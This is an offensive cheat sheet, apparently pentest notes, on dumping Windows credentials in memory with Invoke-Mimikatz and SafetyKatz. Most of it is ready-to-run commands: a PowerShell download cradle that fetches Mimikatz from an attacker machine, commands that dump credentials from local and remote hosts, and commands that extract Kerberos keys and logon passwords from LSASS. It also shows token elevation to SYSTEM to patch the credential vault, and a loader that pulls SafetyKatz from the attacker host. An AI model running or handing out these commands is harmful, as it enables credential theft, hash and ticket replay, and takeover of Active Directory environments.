The script could be used to dump credentials, tickets and more using mimikatz with PowerShell without dropping the mimikatz exe to disk. It is very useful for passing and replaying hashes, tickets and for many exciting Active Directory attacks.
Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script. The script needs administrative privileges for dumping credentials from local machine. Many attacks need specific privileges which are covered while discussing that attack.
To download Invoke-Mimikatz on a abused machine run this command:
iex (new-object system.net.webclient).DownloadString('http://<ip.of.attacker.machine>:<port>/Invoke-Mimikatz.ps1')
Dump credentials on a local machine:
Invoke-Mimikatz -DumpCreds
Dump credentials on multiple remote machines:
Invoke-Mimikatz -DumpCreds -ComputerName @("server1","server2")
There are versions of Invoke-Mimikatz.ps1 in C# like SafetyKatz.exe, SharpKatz.exe etc. with the same functionality:
<aside> 👉🏻 SafetyKatz create Minidump of lsass (a temporary .DMP file is created on the machine) and PELoader run Mimikatz
</aside>
Extract kerberos keys:
.\\SafetyKatz.exe "sekurlsa::ekeys" "exit"
Extract credentials from all providers (authentication packages installed):
.\\SafetyKatz.exe "sekurlsa::logonpasswords" "exit"
Extract credentials on task scheduler → need system privileges:
looks for a token from NT AUTHORITY\SYSTEM and impersonates it
.\\SafetyKatz.exe "privilege::debug" "token::elevate" "vault::cred /patch" "exit"
C:\\Users\\Public\\Reflect.exe 'http://<ip.of.attacker.machine>:<port>/SafetyKatz.exe' "privilege::debug" "token::elevate" "vault::cred /patch" "exit"